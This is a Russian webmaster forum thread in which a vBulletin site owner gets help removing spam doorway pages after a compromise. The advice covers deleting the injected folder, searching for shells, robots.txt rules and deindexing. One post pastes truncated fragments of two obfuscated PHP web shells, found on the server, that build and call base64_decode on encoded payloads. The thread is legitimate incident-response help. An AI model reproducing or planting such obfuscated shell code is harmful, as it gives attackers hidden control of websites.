Как удалить страницы-дорвеи с форума?

креш

Пользователь
Регистрация
15.12.13
Сообщения
41
Реакции
3
Баллы
3
Здравствуйте, помогите в решении очередной проблемы. в общем ситуация такая, яндекс прислал мне вот такое сообщение - Во время последнего посещения сайта наши роботы обнаружили на нем подозрительные страницы, похожие на дорвеи (страницы, единственной целью которых является перенаправление пользователя на другой ресурс). Вот некоторые из обнаруженных страниц:
мой_сайт.ru/community/compaq-presario-cq57-381sr-drayvera.php
мой_сайт.ru/community/dwa-140-drivers.php
мой_сайт.ru/community/radeon-x1300xt-drayver.php

Что бы удалить эти страницы, нужно в корне форума из папки community удалять compaq-presario-cq57-381sr-drayvera.php ? Или не так, помогите пожалуйста!
 

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Это что за движок?
Чтобы дать ответ нужно посмотреть сами страницы.
 

креш

Пользователь
Регистрация
15.12.13
Сообщения
41
Реакции
3
Баллы
3
vBulletin 4.2.0 Страницы какие ? Самого сайта или страниц которые Яндекс нашёл?
 

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Те, который вы давали в первом посте. Они есть в дистрибутиве? Или это уже сгенеренные страницы движком?
 

креш

Пользователь
Регистрация
15.12.13
Сообщения
41
Реакции
3
Баллы
3
У меня нет дистрибутива, проверить не могу.
 

Льюви

Пользователь
Регистрация
22.05.12
Сообщения
1.216
Реакции
996
Баллы
28
Адрес
Харьков
Папки community в дистрибутиве 4ки нет
 

креш

Пользователь
Регистрация
15.12.13
Сообщения
41
Реакции
3
Баллы
3
Льюви спасибо большое, я так и думал что её там не было! Удалять её из корня полностью? Да?
 

Льюви

Пользователь
Регистрация
22.05.12
Сообщения
1.216
Реакции
996
Баллы
28
Адрес
Харьков
Удалять её из корня полностью? Да?
ну как я могу ответить...
если её не ставил как-то хак, если она не была создана администратором для каких-то целей - да, удалять
но этого мало: надо искать, через что залили
надо искать шелл (он может быть не один) и уязвимость
+ прогнать собственный комп несколькими антивирусами
 

креш

Пользователь
Регистрация
15.12.13
Сообщения
41
Реакции
3
Баллы
3
Эту папку я удалил, Яндекс.Вебмастер при проверке браузерного вредоностного кода пишет - "Вредоносный код на сайте не обнаружен", теперь нужно как-то серверный вредоносный код поискать. :sorry:
 

креш

Пользователь
Регистрация
15.12.13
Сообщения
41
Реакции
3
Баллы
3
Вот проверил Айболитом он выдал что сайт содержит 714 шелл-сигнатур, а также 272 других вредоносных фрагментов, что дальше делать?
 

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
Смотреть каждый из файлов, и если это файлы дистрибутива то заменять оригинальными. Если нет, то смотреть что это за файл и уже потом принимать решение.
 

креш

Пользователь
Регистрация
15.12.13
Сообщения
41
Реакции
3
Баллы
3
Кто-нибудь видел эти шеллы? Вот это шелл
<?php $_f___f='base'.(32*2).'_de'.'code';$_f___f=$_f___f(str_replace("\n", '', 'Fq5Brw+c6UuSeLr/tM6FkijYfV419DqBR9LRDZ6dPjcIIw12qnof1oFjIe8ziTWthSDEWObg/LfN4dzE
4By3FFBmMGnYg0Xht5fiRoWtEMlzPe0HH8SrLxXMTbJnIIZG6Sso2Xz9hLI51hnMNflEpkJqyhbVEoG/
brltsOHp4bFltMAOmuDPbjK0g4OBjkT0fkPWtAEy9441B17z4qqNSWQ3DNwb3RGsDW3LPLVefedpsBCP
+xKKYkbf8ZXhAvl5QyLahHuTQ2YJ2s2dCi2yKtxZuRzGSWeshpj6dFvqF/lTX3qY9986bQUv7LCU6zgW
MHNbiBHlZh/jBpXuPy/3odDb+J0xrFEIKpnIB87DYSI6SkQrqbrTJIYc6HofXZc1Di1MNtNl4qFZFMlT
Pbo/TI9rNyf5svRzMRA5F5l48yUHUuhK1jCRwP7P9y61piq03Op5lpNi6KmEzG4umkRaX3RVLYguy0nN
znwFPVPmeCGd20MBvFjk3ocvAjciXucl5NbV8ammR8Y+kHK1hxPIlcpPVuA8yRzXz+fzfASyGZSpm/Uu
pQI1ZQHi+4JbOWVGXoglDUs+5tlsV84EspJGIwL+Pxv1L7DhId7T/oJ3PKx2rUVY1qd2Bc6WXfbDqgMV
/t44zuKrhOnR9UV6DBwdht9FRX2kvOdxpEI3W1e1V/wuA+kaI92z8De7p6v7cAvdMGUnujXxb/gjdUy1
DDtj2PbBUOlI1cSw9ozoMaX+ry+vEp72Dsv0EgIljgz3GhJVKojHhweQo2J4m6GRHjziNKF9m/UPYhq4
K0rtw+XF/IhzEvsFus9f9MEDDpdLq5CTANnnCw25///KbxQ2/K9R9XDS+4BZVp0sw/DkfJyCPIcMFpw4
CzSseeElN+tYsO84BUvYPTF1/zxfACiDZdd5khj5YQdD2NxkArFJYfxYDgLHbnSwlBG8b04H38o4natI
wYYuHhfcgd6KPlj5/5H9p8bTu17xQ2V4NEkMZjscL4JSV/VOYJczz3ZPYLWRz0rgLhVN7JAepYdsaepB
f+YJew7yJdEP+3dkNK+GmTfSP1gS3z1yO22i6hw5L9066V3mg/s29XIUFcG5VYgilGNX92CAaee0jXjR
NyMtI1GfW9gOyl/ZAV4B6q5WCoDJ7zBcMYmgYXnqRVdWBR3K3p4KGWaR8xAeMSI5kwtxO9wbZswWfqkc
FceYk1V72fJ/aMAvvD8gXX6RRArNf/5xvvBwh8+EvhVE0wd12fbQMYcur5YwUgJDuXPNleW4vq5QGVya
zMYkJk94cpO6wuNekXCF5mJUqWyQExjQNsS8qLGS8tOF3+v98Z4dLwEYczS7o0hAS/+T4P6lsBiHnnDI
mV0ctKnZvo0NK6MCn/eU+rCD3J46nSGNwK0Os0pUmvic+m5ZvKVHZrD4oVbfW3AKz3CqgB0tK7LSSVhS
j8JtalBXlJk0BYZ1Rz3nQVcUkmUMX9bion/oYLUGdUIZHlI/jDcyQ3HKpIuDLO938i3OHadAaq+S8yTw
FT9fLdqWtzkQNBMcztibAqbkxOGOpRTxsgX8yT/dT+QnfwH0/ADxj6bjn03oCA/IigwjPkVmsnB9K/eq
JFlnYkil18s4MLUIIny2e6hR1+cq2k6XrENierkMNg/f+GeaeiNM4mWuAem4KkMpXzoDWriw+uG5Hb48
Nc+1MfVSFUll/sYbAFErMKeOUZNkIs2mQrgLNTxzb8p/vl5fPHL9wybg91WNSHE9l4S0FXXGTLcBiX7y
b3HzJ3eNmUqsOY1EwQa739sGyoUi4AxeeJM4B1mMa9lTqfeLKkZ9Prf2FgnR9JBQDlG22hUkHEeSWdNC
Zq0zLgxqSUaqT2BkcgXg3F0k8OYDxr/rzh/+3aS8NUMTvu8QJtpYXgRT2io45guAdbW6172SewgS+w6g
NYYjMtqqKHA1mdWZ25RVszakcAwNbuN1asfseP5wkDOoln6zsWUTMlfuRt31JzbZglVTt9RevBCcXgMz
Zz71+pJbfOtpHdoGU1Tq/3Wfm2yKektK+Dtj2K1HkDALfjcW1k7NaUwUB5+UcjU7rQ1itSE6SydKVFyd
iNudJXA/EXh5WmFPtELLLoFTXBOZPDjoC/FCXA114jEyHH/nN+x2v3NYnVJw5HARVXVUxrlonkLPqVcj
NO3jyZK41HB1d9AOKFCATHEHwwK57EwUaUeNgQfz0rhitHmed3p/7Mr05ApvokDHODpYhFYOkv4DsuG0
/XA6hRvyI80gQFKRy2u2xy2Ie7DQUUuwAP/PHanP4l1XTthrm6FtAVhek7N7w9qJ6aFFicNtSkUPDjAd
/FDWs9tnD6fwFQClWmVpXp4eGpvY04DS+VLmw7Q572XW0JSIdkEKRRBVB4LZqDGrExLniHUnTg+63KrD
3kdK8CAgDerAZnGtnIFvvBYcQQYNznIMlXFVYbqi8SLf6NLRwp4t4id/3ZkhExliT2SqFTj0XOWUpVqV


ИЛИ ЭТО - <?php
$fZxUS="\142\141";$ERzjDP_="\163\145";$EyhsA="\66\64";$srdz="\137\144";$rAnJbB="\145\143";$myEPx='od';$YLZUqor="\145";$XWTjB=$fZxUS.$ERzjDP_.$EyhsA.$srdz.$rAnJbB.$myEPx.$YLZUqor;$pRoFmOb='BxyMV8seCnR=X61Kaw9PkEu5hz4i';$ImtC='GATjf32qgoINvF0YHZcJbmLQUOtDSrWlpd';$DFLe=$pRoFmOb.$ImtC;$ceirjV='H:slu$o{\'cxh}i?AE&wyMFq(D5ZJLgTR.2vOd1GWprt4,Xm/z~3I_K`P!860[a';$ZjfV=$ceirjV;$XktWEy='X}XDz\'DJ4}W0WRx.XLuRzvx0A\'/E6F[(4RWAX~W`ucaJlt1&4um?zM`FI}Hy{u/1XrD!z?d5I';$akOwS='~DRlt?c_rWHE_?`x}[Wu?F&T6[6zu0O_~DKutX866[EE00`6}DWE0[1TMaKzrMs!~`yuF?[T2apE?';$SXdUNHu='MsK}WJlt0c_rWHE_Ms_~?K_tM2Iv0!E?[}6';$eTWa='~DMu2d&6P/LE~x,z,XJE_F(!_WMxvr}{L:RlPr14~0RWtW[_~`Eu?[1XraZlrd5uc[';$zjTXBq='EuR0146?LWF0FlLaM!F1';$hFnDqj=':60x5!t[,_~:Ez_4:4MD!X0MsELDRzM(oXFWH';$YHZf='K_0PXrDDu5u84RWM{M:_x}0KuFuqT2a&avW`u~';$bCDcTnA='(4lt[o4taZErMsu6w/ETD?!vM(zF0[av04!LmsT0XZWF(i6~W0xr0Z6FDcl0F:{PxWE~DRX_xXl?';$QiGks='DGX5WxucdtT~[o4vuF6MX4!LmsT~:ZWF(8T~W0xr0Z6FDclt(L{PxKE0XRX_x/WrDGX5/Wz,dtT~[L4vuF42[4!LmsT0XZWF';$JHxW='?i6~W0xFt&6FDclu/o{PxKE0/RX_xXluDGX5/Wl}dtT~`E4vuF6TH4!LmsT0XZWF?OXv(Kl6aZ4v?uW6Wi!RXllr/?T';$IZbp='?XEE~Isl}rEz,HZ!5r\'60XG_RrKlt?(urm?Eru_uRHWz}Hu4taKlu15IT/EuM/345G:WLW`arxWuM/sXr_?m04s6TWKlFt';$IvhGFzu='&_T/t_?/4xRuKxF(_Tc[WWrxOxR/Xz0X`4txMx?WuuM/uE2Hs_uXAI?ruEruKlvDTu~t?T?W}{PrDur/Xu,[EEtZ&mPxK{M';$njpjZ='[u_}M(_uxO!~`Ju6dv46?2Wr[,!~rE';$lkDYM='E~ItT6?!ar[FzF:TzLD[_tuKlruLxMxXzL:/X6?&z0l:Xr[MxcH!uRH!';$NOBf_DL='E?/`K,[}!r[:TPWM!ul:IM(DE?[yXL`Mm~uqXPxll?[u4c[L';$awRAviN='EtosEF?yut(ZT6o:xtw4_Mxyu?/quFxca0G&aFwEuLm&uLM(m6W4ErWJxF/x_0atlr';$CULuO='xOuR/Xu}DsTtuL4u[ru~r6l}H\'!5H2l6WG!M`TltZ56MX!u6uTKPr0x0/yXL[c{6u6X,xWx6$t4';$yUXlmvR='5WR{r/qEF(EzT0/utm(6r/FIcuTlr[WXrXM{F?6T~rX{}xZX6[omru8X5W!E';$TfFVe='~:`X6(Al6/66MxMz_?suL`MuuaLzrrl{~&&XuDc{_(,W6`Tl,x&T~:Lurr8X2[uuLD`T6`K6LrOX5HuxuG5_0DLWua6I0X!!r';$nwaY='X4_tX&{6/4xTr}6L:i40xxl6uO_TuDzrG?u_X1!6/`T~(E';$JoMGOW='xT0!_?uKE~x}lTXKxLxs46o?W6W8XLDulPu(TM_?{r[LIT/EI2l:_?XKE?au_ca!lL';$LaCQoN='x3TR/AEM&5!Rr!lPu(T?xEzuui_M/KEMF5u_X!zM';$NbzO_dk='osX,[Xut_?6TW\'W~riT~?6Ev:,Tux1T0xrXF?WuT0W!5/!!LIsmF/u6,Hl4_aZ!';$XZIoW='u1:_c/_xM/F4R/!_r4&TRXuuM(F_~`8lr/6_0u}uTFv6TWKT0xuEru3l}HiTtDKx0/4EFW_ltX44uxA_r[oT}[';$rtSQuVW='xu6x&XPr\'T_&:mLwJl0[x4_Wt_uuul}xxl,HuuL[Au0r6_M:!l2HO';$cKtbq='TTWpWFZsl_/ME?M&uvt?x00}xTH!z_[xuu';$ohGI='XHa0uuX5WRz6:A4_X\'E?M5I}0D!F(\'_v(Klvu_TM(TxrF:u?_?W0I&xMXKl6`(!5Hcl';$uDiILyq='LuozPuTu5rG6~(rWF?_EL[_lRDv6TH6TLxiuc/EE~:p4tDKlvuFx0rRxvDGuFaAmr[rK6D0u}H_T6?!z00_E';$OLnS='LD3{M[t4_xL_Lx4mF/yxLxy4v(oavriXF?XE2D`uL[';$zjEa_='o{0a}x0[Jl6`vu0uM6u0OIM/JxuFt4txK!Mw46}aREv:l4tDMI?[FxRX6xcHy_MD!_rlszL[ux0Xy_R/ZaF';$fraZOdE='(,!c0TuTrGuPH&WLr(a,WJu0/1uL?1It(`l6wyx~:Kur_ta?u[m5HJEMu(';$dBefR='u?XM!0IsTMuuxLWsuR/!6rWLI0DEu~$?_v?Au0W4uM:uuv:IuruXWu/,lTuxzM(v_Ma66ulsxcHJz}xlu~:&E~F:!0D_x}Hi';$TNoAZ='XPWExuxoX2/llu/866`Ka?l5_ca_l~DWu6?Zu_?rx}[xEtM:_tDXm0/rKu[';$jmujbO='Rxu/\'_~[1x?XPm5x3l0/\'T0X\'mF?6EPu3lt(56uDHWLu,TTxEx6x&u6:XWrarEFW__2xr_6?c{';$FqhUBW='~/qx~wTuFXx_c[MzM?`aFa!u}x(Tc[K_?G5TMDxEtXG4}[KTur6uTW_xT0,u~o';$vfBD=':auaouMXRzM(uTMX!IMosTcHuE~:LTRG?z?r4TT/ll_XOT__:T6/Gx0D_lL';$NjiqjI='DIXFXLlt(}6M`uz_1?_~t(_M&5z20KuLWZ_0uAuur__MaEuM[}T~?K_6W,m2[REM/2u?x8l?x,l_WJxvxq4c[1m~WL_';$BPKz='M/Wx~x[4ua/{uX}ucDxlRus_tuZ_6lsl_a6l6D,TR/ozLW`K_Dl{~D!6RHKEM(_uc/xz~:A_6?Mxt&:E';$HMPvN='PWxlMt:TMD&a?[F!cxWuM[suru1xFt&XF`J';$ZaIt='{0[?uuu/mM&&Tcauz}x,_~[A{6W8_}/Mu6xtXL[\'a0[uTMxK{M[xu~[o{_?6TM/0x?/F6ua6m?/uX2DME~DIT0';$tUCMBeD='D6ut?L_M/Tx~x\'XuDxavF56}0Tu6xE6MD6!rxr6~`_EM(r45WoIMw4uMuExcHZurDMTM(8';$dMsXEU='EL`M_2l5TMxulvu8luXy6FXr_?X&';$Aielydz='u6xux00R{0[8_6`L!Ll&mr/MlFX3Xua!4uF5_cr}z}H1T?x\'x0x8TTWyxv`sT6:HmM`iXL(JI2xX_5WrW';$ChLaZm='uriI0/M{~l?_R/A_rr}u~DKx?/P4MaZm6rPK_(uE2dv4MxAa~r8TRuT6F[D4?a&6rxoE20xz0[GXPHp{';$VLUdTtr='6IsaL(6x~D(Xrx\'m~F&_Mx0u0[s_6?/l?/,W}/xu0_&66(!{uX8zPuXlMt?urx\'46';$uUJRSz='r[aPu_zLo5_v(1I~u}!TuWzTuT4~t';$hHVLA=':E_(_E5x}u6x`_?xLm6u8{FxDucH\'_uuM60Ms6MDxuLxTu';$EsTwx='_xHavl&mFWTlR_:T?_(zrWoI0[J6rX}T0uAmLx8';$DjuLA='z5/6xvD?_Rg(!vx_ErXT{MMs6c[\'!vl:zL[}zu[860u!lrXGzFxXz_X\'uFa1!0Xul,DJx';$dSVCRPQ='~xW_taA{6rO60/WEM/,6uDAa~Is60[XlP08_Mxo_uu';$OCTen='__~DWlR01u6o&luWi_c[xlF[[XL:K4_?rzruXzFX?X6?1murulu0TzTuITu_tW6r`';$KMhwBNG='T~0MlF(T6RWLW_Z&_RrDxF(ZTT/tau1:x}[';$PLoz='3lLW(_?l(_?X8mrx}z6DKXuar{~lszPxKu5r?TMxLE0[6!~wllM4?6Tg(avu}uc';$vlPx='/uu_1?4Ma1m6W_X,H_!F(rT0aAa';$fRxwrjc='uX,zPWTxtuZuRGt{r45!';$OYpdzFo='0a6l~d:_RH&E?xqzPr}!L:ruruEu0W,aLr!x}H\'XuXM!~WuXL:Tu~x/XPr\'uru`m2auxu/T4v[Mzvr`l,0XEtX\'4TH&lvW_I';$_sLnu='}0xzMF5_MxcWL/u_Rxu{M/y_uX1zvWOu~r}zu/ZXu';$OdrIkip='xLWrX_!M`3l2g5_?xA_M&:6cuEE~`2_6?MI?r__0[K_50EXL[RlurO6~rDzcHt4MxrWu';$xfnoG='W_!RX0xF/E4?u&6uWq!0rEuvl5T6?&l?Fs!MuJEttsTP/EIM&s{,X6uT0__5WK_rW_uM:Eu6DFu?m(z';$_GPQ='t(PK_:R!F(i45r!mM?L6MaRx6DT_6:eek:l6I&lu[uE2DrXuDXlLI&KuxRxF/!4Muo6';$WZfi='LuGzrrT6L:su~`&a?uL6~wy6LmsuPHZT?M&a5WTut(2u0x!I0X';$zvNuG='GX,rTu~:/

Это они не полностью, так кусочки.
 

креш

Пользователь
Регистрация
15.12.13
Сообщения
41
Реакции
3
Баллы
3
Всё это время мучился с этими шелами, сегодня скачал чистый дистрибутив и проверил его айболитом и получил то же самое что и при проверке своего форума. Текущая база скрипта содержит 714 шелл-сигнатур, а также 272 других вредоносных фрагментов. Что это значит? Дистрибутив уже заражён?
Кстати папку community я удалил из корня и перенёс в комп, открыв её в компе там оказались картинки, аватарки!
А Яндекс.Вебмастер продолжает слать эти сообщения : Во время последнего посещения сайта наши роботы обнаружили на нем подозрительные страницы, похожие на дорвеи (страницы, единственной целью которых является перенаправление пользователя на другой ресурс). Вот некоторые из обнаруженных страниц:
avto-.ru/community/3com-etherlink-xl-10-100-pci-drayver.php
avto-.ru/community/i-sensys-mf4010-drayver-skachat.php
avto-.ru/community/showforum-8-2.php

Только как, я ведь удалил папку community? Уже нет мыслей что делать.
 

Льюви

Пользователь
Регистрация
22.05.12
Сообщения
1.216
Реакции
996
Баллы
28
Адрес
Харьков
Что это значит? Дистрибутив уже заражён?
айболит страдает некоторой параноидальностью, это факт... где-то я об этом уже говорила
откуда брали дистрибутив?

Только как, я ведь удалил папку community?
это как раз нормально, Яндекс что-то обрабатывает из собственного кеша
погодите, вот ещё они напару с Гуглом начнут слать письма про "увеличение 404", угу, угу...

А что там было вообще, на этих страницах? фейк фкантакта или "мой мир"?
.хтаксесс в этой папке - был? если да - какой?
 

креш

Пользователь
Регистрация
15.12.13
Сообщения
41
Реакции
3
Баллы
3

Льюви

Пользователь
Регистрация
22.05.12
Сообщения
1.216
Реакции
996
Баллы
28
Адрес
Харьков

Wmboard

Пользователь
Регистрация
01.01.70
Сообщения
9.274
Реакции
2.665
Баллы
28
Адрес
На wmboard
А Яндекс.Вебмастер продолжает слать эти сообщения

Ну так и должно быть. Яндекс ведь моментально реагирует только на заражение, а на лечение не спешит :) В вебмастере вроде должна быть "заказать перепроверку".
 

креш

Пользователь
Регистрация
15.12.13
Сообщения
41
Реакции
3
Баллы
3
В папке community .хтаксесс небыло.
 

креш

Пользователь
Регистрация
15.12.13
Сообщения
41
Реакции
3
Баллы
3
Так что, пока не обращать внимание на сообщения от Яндекса?
 

Льюви

Пользователь
Регистрация
22.05.12
Сообщения
1.216
Реакции
996
Баллы
28
Адрес
Харьков
Так что, пока не обращать внимание на сообщения от Яндекса?
/community/ - в роботс.тхт
в панели вебмастера поотправлять запросы на удаление этих страниц из индекса и из кеша
 

креш

Пользователь
Регистрация
15.12.13
Сообщения
41
Реакции
3
Баллы
3
Понял, спасибо!
 

Статистика форума

Темы
200.634
Сообщения
380.522
Пользователи
327.876
Новый пользователь
pm1199
Сверху Снизу